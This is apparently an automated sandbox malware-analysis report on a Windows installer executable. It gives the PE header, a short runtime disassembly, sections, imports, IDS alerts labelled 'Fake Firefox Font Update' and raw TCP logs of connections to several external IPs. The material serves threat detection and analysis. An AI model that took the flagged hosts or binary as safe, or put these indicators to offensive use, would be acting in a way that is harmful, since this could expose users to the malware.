Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5A10AD86 [Sat Nov 18 22:00:38 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	d7e2fd259780271687ffca462b9e69b7

Entrypoint Preview

Instruction
call 00007EFD80E5933Fh
jmp 00007EFD80E58CB3h
mov eax, dword ptr [esp+08h]
mov ecx, dword ptr [esp+10h]
or ecx, eax
mov ecx, dword ptr [esp+0Ch]
jne 00007EFD80E58E2Bh
mov eax, dword ptr [esp+04h]
mul ecx
retn 0010h
push ebx
mul ecx
mov ebx, eax
mov eax, dword ptr [esp+08h]
mul dword ptr [esp+14h]
add ebx, eax
mov eax, dword ptr [esp+08h]
mul ecx
add edx, ebx
pop ebx
retn 0010h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
cmp cl, 00000040h
jnc 00007EFD80E58E37h
cmp cl, 00000020h
jnc 00007EFD80E58E28h
shrd eax, edx, cl
shr edx, cl
ret
mov eax, edx
xor edx, edx
and cl, 0000001Fh
shr eax, cl
ret
xor eax, eax
xor edx, edx
ret
push ebp
mov ebp, esp
jmp 00007EFD80E58E2Fh
push dword ptr [ebp+08h]
call 00007EFD80E5F6ACh
pop ecx
test eax, eax
je 00007EFD80E58E31h
push dword ptr [ebp+08h]
call 00007EFD80E5F735h
pop ecx
test eax, eax
je 00007EFD80E58E08h
pop ebp
ret
cmp dword ptr [ebp+08h], FFFFFFFFh
je 00007EFD80E596C4h
jmp 00007EFD80E596A1h
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007EFD80E596DDh
pop ecx
pop ebp
ret
push ebp
mov ebp, esp
test byte ptr [ebp+08h], 00000001h
push esi
mov esi, ecx
mov dword ptr [esi], 00460DB8h
je 00007EFD80E58E2Ch
push 0000000Ch
push esi
call 00007EFD80E58DFDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x686b4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6d000	0x3a24	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x71000	0x3dfc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x67650	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x676a4	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x67030	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4b000	0x3e0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x68234	0x100	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x49937	0x49a00	2319c0baa707bb66cc0bc08c55a13d8c	False	0.5314688561120543	data	6.570006046413636	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4b000	0x1ed60	0x1ee00	8ad6c4e18165c6d8ccdc97bab683438d	False	0.3136386639676113	data	5.114228301263695	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x6a000	0x1730	0xa00	00fde973df27dc2d36084e16d6dddbdf	False	0.274609375	firmware 2005 v9319 (revision 0) N\346@\273\261\031\277D V2, 0 bytes or less, UNKNOWN2 0xffffffff, at 0 0 bytes , at 0 0 bytes , at 0x20a14600	3.1526594027632213	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.wixburn	0x6c000	0x38	0x200	e9ca1c09062508c3b92e35754e60f8d0	False	0.107421875	data	0.5734966016060967	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x6d000	0x3a24	0x3c00	88921ee6f52b1477449352c993b3919c	False	0.3304036458333333	data	5.550645858532838	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x71000	0x3dfc	0x3e00	dd2c47fa48872886af4c9a2e5bd90ccc	False	0.8097278225806451	data	6.794335469567533	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x6d178	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.43185920577617326
RT_MESSAGETABLE	0x6da20	0x2840	data	English	United States	0.28823757763975155
RT_GROUP_ICON	0x70260	0x14	data	English	United States	1.15
RT_VERSION	0x70274	0x2dc	data	English	United States	0.4781420765027322
RT_MANIFEST	0x70550	0x4d2	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1174), with CRLF line terminators	English	United States	0.47568881685575365

Imports

DLL	Import
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, InitiateSystemShutdownExW, GetUserNameW, RegQueryValueExW, RegDeleteValueW, CloseEventLog, OpenEventLogW, ReportEventW, ConvertStringSecurityDescriptorToSecurityDescriptorW, DecryptFileW, CreateWellKnownSid, InitializeAcl, SetEntriesInAclW, ChangeServiceConfigW, CloseServiceHandle, ControlService, OpenSCManagerW, OpenServiceW, QueryServiceStatus, SetNamedSecurityInfoW, CheckTokenMembership, AllocateAndInitializeSid, SetEntriesInAclA, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, RegSetValueExW, RegQueryInfoKeyW, RegEnumValueW, RegEnumKeyExW, RegDeleteKeyW, RegCreateKeyExW, GetTokenInformation, CryptDestroyHash, CryptHashData, CryptCreateHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextW, QueryServiceConfigW
USER32.dll	PeekMessageW, PostMessageW, IsWindow, WaitForInputIdle, PostQuitMessage, GetMessageW, TranslateMessage, MsgWaitForMultipleObjects, PostThreadMessageW, GetMonitorInfoW, MonitorFromPoint, IsDialogMessageW, LoadCursorW, LoadBitmapW, SetWindowLongW, GetWindowLongW, GetCursorPos, MessageBoxW, CreateWindowExW, UnregisterClassW, RegisterClassW, DefWindowProcW, DispatchMessageW
OLEAUT32.dll	VariantInit, SysAllocString, VariantClear, SysFreeString
GDI32.dll	DeleteDC, DeleteObject, SelectObject, StretchBlt, GetObjectW, CreateCompatibleDC
SHELL32.dll	CommandLineToArgvW, SHGetFolderPathW, ShellExecuteExW
ole32.dll	CoUninitialize, CoInitializeEx, CoInitialize, StringFromGUID2, CoCreateInstance, CoTaskMemFree, CLSIDFromProgID, CoInitializeSecurity
KERNEL32.dll	GetCommandLineA, GetCPInfo, GetOEMCP, CloseHandle, CreateFileW, GetProcAddress, LocalFree, HeapSetInformation, GetLastError, GetModuleHandleW, FormatMessageW, lstrlenA, lstrlenW, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, Sleep, GetLocalTime, GetModuleFileNameW, ExpandEnvironmentStringsW, GetTempPathW, GetTempFileNameW, CreateDirectoryW, GetFullPathNameW, CompareStringW, GetCurrentProcessId, WriteFile, SetFilePointer, LoadLibraryW, GetSystemDirectoryW, CreateFileA, HeapAlloc, HeapReAlloc, HeapFree, HeapSize, GetProcessHeap, FindClose, GetCommandLineW, GetCurrentDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, FindFirstFileW, FindNextFileW, MoveFileExW, GetCurrentProcess, GetCurrentThreadId, InitializeCriticalSection, DeleteCriticalSection, ReleaseMutex, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CreateProcessW, GetVersionExW, VerSetConditionMask, FreeLibrary, EnterCriticalSection, LeaveCriticalSection, GetSystemTime, GetNativeSystemInfo, GetModuleHandleExW, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetEnvironmentStringsW, VerifyVersionInfoW, GetVolumePathNameW, GetDateFormatW, GetUserDefaultUILanguage, GetSystemDefaultLangID, GetUserDefaultLangID, GetStringTypeW, ReadFile, SetFilePointerEx, DuplicateHandle, InterlockedExchange, InterlockedCompareExchange, LoadLibraryExW, CreateEventW, ProcessIdToSessionId, OpenProcess, GetProcessId, WaitForSingleObject, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, CreateThread, GetExitCodeThread, SetEvent, WaitForMultipleObjects, InterlockedIncrement, InterlockedDecrement, ResetEvent, SetEndOfFile, SetFileTime, LocalFileTimeToFileTime, DosDateTimeToFileTime, CompareStringA, GetExitCodeProcess, SetThreadExecutionState, CopyFileExW, MapViewOfFile, UnmapViewOfFile, CreateMutexW, CreateFileMappingW, GetThreadLocale, IsValidCodePage, FindFirstFileExW, FreeEnvironmentStringsW, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DecodePointer, WriteConsoleW, GetModuleHandleA, GlobalAlloc, GlobalFree, GetFileSizeEx, CopyFileW, VirtualAlloc, VirtualFree, SystemTimeToTzSpecificLocalTime, GetTimeZoneInformation, SystemTimeToFileTime, GetSystemInfo, VirtualProtect, VirtualQuery, GetComputerNameW, SetCurrentDirectoryW, GetFileType, GetACP, ExitProcess, GetStdHandle, InitializeCriticalSectionAndSpinCount, SetLastError, RtlUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RaiseException, LoadLibraryExA
RPCRT4.dll	UuidCreate

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-09T14:55:59.804719+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	49975	172.67.174.91	443	TCP
2025-01-09T14:56:01.532105+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	49976	172.67.174.91	443	TCP
2025-01-09T14:56:02.422967+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	49977	172.67.174.91	443	TCP
2025-01-09T14:56:30.575344+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50086	172.67.174.91	443	TCP
2025-01-09T14:56:32.418264+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50088	172.67.174.91	443	TCP
2025-01-09T14:56:32.928121+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50089	172.67.174.91	443	TCP
2025-01-09T14:56:34.787021+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50090	172.67.174.91	443	TCP
2025-01-09T14:56:35.718133+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50091	172.67.174.91	443	TCP
2025-01-09T14:56:36.723330+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50092	172.67.174.91	443	TCP
2025-01-09T14:56:38.135127+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50093	172.67.174.91	443	TCP
2025-01-09T14:56:39.843130+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50094	172.67.174.91	443	TCP
2025-01-09T14:56:41.311266+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50095	172.67.174.91	443	TCP
2025-01-09T14:56:56.504303+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50096	172.67.174.91	443	TCP
2025-01-09T14:56:58.283517+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50097	172.67.174.91	443	TCP
2025-01-09T14:56:59.120214+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50098	172.67.174.91	443	TCP
2025-01-09T14:57:00.009627+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50099	172.67.174.91	443	TCP
2025-01-09T14:57:01.559866+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50100	172.67.174.91	443	TCP
2025-01-09T14:57:03.322774+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50101	172.67.174.91	443	TCP
2025-01-09T14:57:04.371072+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	50102	172.67.174.91	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 14:54:39.765860081 CET	49674	443	192.168.2.10	173.222.162.55
Jan 9, 2025 14:54:39.766047001 CET	49675	443	192.168.2.10	173.222.162.55
Jan 9, 2025 14:54:41.553253889 CET	49677	443	192.168.2.10	20.42.65.85
Jan 9, 2025 14:54:41.859496117 CET	49677	443	192.168.2.10	20.42.65.85
Jan 9, 2025 14:54:42.468945026 CET	49677	443	192.168.2.10	20.42.65.85
Jan 9, 2025 14:54:43.672118902 CET	49677	443	192.168.2.10	20.42.65.85
Jan 9, 2025 14:54:46.078665018 CET	49677	443	192.168.2.10	20.42.65.85
Jan 9, 2025 14:54:49.375123978 CET	49674	443	192.168.2.10	173.222.162.55
Jan 9, 2025 14:54:49.375343084 CET	49675	443	192.168.2.10	173.222.162.55
Jan 9, 2025 14:54:50.890743971 CET	49677	443	192.168.2.10	20.42.65.85
Jan 9, 2025 14:55:00.500150919 CET	49677	443	192.168.2.10	20.42.65.85
Jan 9, 2025 14:55:59.310060978 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:55:59.310095072 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:55:59.310193062 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:55:59.311333895 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:55:59.311350107 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:55:59.804200888 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:55:59.804718971 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:55:59.806478024 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:55:59.806494951 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:55:59.806757927 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:55:59.857567072 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:55:59.857567072 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:55:59.857588053 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.505590916 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.505639076 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.505680084 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.505716085 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.505750895 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.505804062 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.505804062 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.505825043 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.505925894 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.505942106 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.505949020 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.505974054 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.506007910 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.506033897 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.506105900 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.506113052 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.506376028 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.586693048 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.596260071 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.596302032 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.596354961 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.596379995 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.596407890 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.596431971 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.596452951 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.596461058 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.596461058 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.597317934 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.597341061 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.597364902 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.597379923 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.597395897 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.597445011 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.597524881 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.597524881 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.597533941 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.598299980 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.598311901 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.598351955 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.598370075 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.598417044 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.598417044 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.598424911 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.598499060 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.599725008 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.599778891 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.599788904 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.599921942 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.599930048 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.600033045 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.671591997 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.687805891 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.687839985 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.687865019 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.687875032 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.687881947 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.687895060 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.687935114 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.687949896 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.687968969 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.688015938 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.688240051 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.688292980 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.688319921 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.688328028 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.688401937 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.688401937 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.688766003 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.688786983 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.688831091 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.688848019 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.688869953 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.688941002 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.821285963 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.821285963 CET	49975	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:00.821321011 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:00.821332932 CET	443	49975	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:01.045162916 CET	49976	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:01.045217037 CET	443	49976	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:01.045283079 CET	49976	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:01.046587944 CET	49976	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:01.046602011 CET	443	49976	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:01.531994104 CET	443	49976	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:01.532104969 CET	49976	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:01.533647060 CET	49976	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:01.533655882 CET	443	49976	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:01.533929110 CET	443	49976	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:01.534949064 CET	49976	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:01.534974098 CET	49976	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:01.535020113 CET	443	49976	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:01.837065935 CET	443	49976	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:01.837189913 CET	443	49976	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:01.837287903 CET	49976	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:01.837634087 CET	49976	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:01.837651014 CET	443	49976	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:01.837660074 CET	49976	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:01.837666035 CET	443	49976	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:01.898844957 CET	49977	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:01.898902893 CET	443	49977	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:01.899076939 CET	49977	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:01.899624109 CET	49977	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:01.899643898 CET	443	49977	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:02.422868967 CET	443	49977	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:02.422966957 CET	49977	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:02.425039053 CET	49977	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:02.425060987 CET	443	49977	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:02.425357103 CET	443	49977	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:02.436052084 CET	49977	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:02.436094999 CET	49977	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:02.436111927 CET	443	49977	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:02.754909992 CET	443	49977	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:02.754987955 CET	443	49977	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:02.755104065 CET	49977	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:02.755234003 CET	49977	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:02.755258083 CET	443	49977	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:02.755275011 CET	49977	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:02.755281925 CET	443	49977	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:11.097932100 CET	50002	443	192.168.2.10	18.244.18.122
Jan 9, 2025 14:56:11.097958088 CET	443	50002	18.244.18.122	192.168.2.10
Jan 9, 2025 14:56:11.098031044 CET	50002	443	192.168.2.10	18.244.18.122
Jan 9, 2025 14:56:11.098485947 CET	50002	443	192.168.2.10	18.244.18.122
Jan 9, 2025 14:56:11.098501921 CET	443	50002	18.244.18.122	192.168.2.10
Jan 9, 2025 14:56:11.838674068 CET	443	50002	18.244.18.122	192.168.2.10
Jan 9, 2025 14:56:11.954708099 CET	50002	443	192.168.2.10	18.244.18.122
Jan 9, 2025 14:56:11.994200945 CET	50002	443	192.168.2.10	18.244.18.122
Jan 9, 2025 14:56:11.994211912 CET	443	50002	18.244.18.122	192.168.2.10
Jan 9, 2025 14:56:11.995434046 CET	443	50002	18.244.18.122	192.168.2.10
Jan 9, 2025 14:56:11.995445967 CET	443	50002	18.244.18.122	192.168.2.10
Jan 9, 2025 14:56:11.995507956 CET	50002	443	192.168.2.10	18.244.18.122
Jan 9, 2025 14:56:12.002635956 CET	50002	443	192.168.2.10	18.244.18.122
Jan 9, 2025 14:56:12.002732992 CET	443	50002	18.244.18.122	192.168.2.10
Jan 9, 2025 14:56:12.057435036 CET	50002	443	192.168.2.10	18.244.18.122
Jan 9, 2025 14:56:12.057446957 CET	443	50002	18.244.18.122	192.168.2.10
Jan 9, 2025 14:56:12.159714937 CET	50002	443	192.168.2.10	18.244.18.122
Jan 9, 2025 14:56:13.646224976 CET	50010	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:13.646260977 CET	443	50010	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:13.646518946 CET	50011	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:13.646553040 CET	50010	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:13.646563053 CET	443	50011	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:13.646677017 CET	50011	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:13.646868944 CET	50010	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:13.646879911 CET	443	50010	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:13.647000074 CET	50011	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:13.647012949 CET	443	50011	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:13.668461084 CET	50012	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:13.668505907 CET	443	50012	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:13.668771029 CET	50012	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:13.669356108 CET	50012	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:13.669374943 CET	443	50012	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.130688906 CET	443	50011	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.131153107 CET	50011	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.131182909 CET	443	50011	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.132225037 CET	443	50011	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:14.132285118 CET	50011	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:14.137398958 CET	443	50010	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:14.137641907 CET	50010	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:14.137654066 CET	443	50010	162.159.61.3	192.168.2.10
